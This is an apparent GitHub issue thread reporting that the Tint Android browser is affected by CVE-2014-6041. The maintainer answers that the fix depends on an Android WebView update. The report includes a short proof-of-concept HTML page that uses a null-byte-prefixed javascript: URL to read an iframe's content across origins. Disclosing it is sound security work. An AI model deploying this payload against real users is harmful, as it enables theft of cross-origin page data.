TintBrowser
TintBrowser copied to clipboard
Anasthase
Same Origin Policy bypass (CVE-2014-6041)
Tint is vulnerable to http://www.cvedetails.com/cve/CVE-2014-6041/
Summary: "The Android Browser application 4.2.1 on Android allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window.open('\u0000javascript: sequence. "
Tint is affected too. Does it use the Android Browser engine?
You can check it at http://ejj.io/SOP.php
The source of the page is
<html>
<head>
</head>
<body>
<iframe name="testwindow" src="http://snudey.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','testwindow')" >
</body>
</html>
It shouldn't be possible to access document.body.innerHTML from outside the iframe, but it is. Unfortunately I have to stop using Tint until this issue if fixed.
Tint uses the WebView component from the Android SDK, which i believe is the same as the stock browser. So the issue can only be fixed through an Android update.
Sorry about that.
2014-09-16 9:27 GMT+02:00 Paolo Montrasio [email protected]:
Tint is vulnerable to http://www.cvedetails.com/cve/CVE-2014-6041/
Summary: "The Android Browser application 4.2.1 on Android allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a \u0000 character, as demonstrated by an onclick="window.open('\u0000javascript: sequence. "
Tint is affected too. Does it use the Android Browser engine?
You can check it at http://ejj.io/SOP.php
The source of the page is
It shouldn't be possible to access document.body.innerHTML from outside the iframe, but it is. Unfortunately I have to stop using Tint until this issue if fixed.
— Reply to this email directly or view it on GitHub https://github.com/Anasthase/TintBrowser/issues/79.
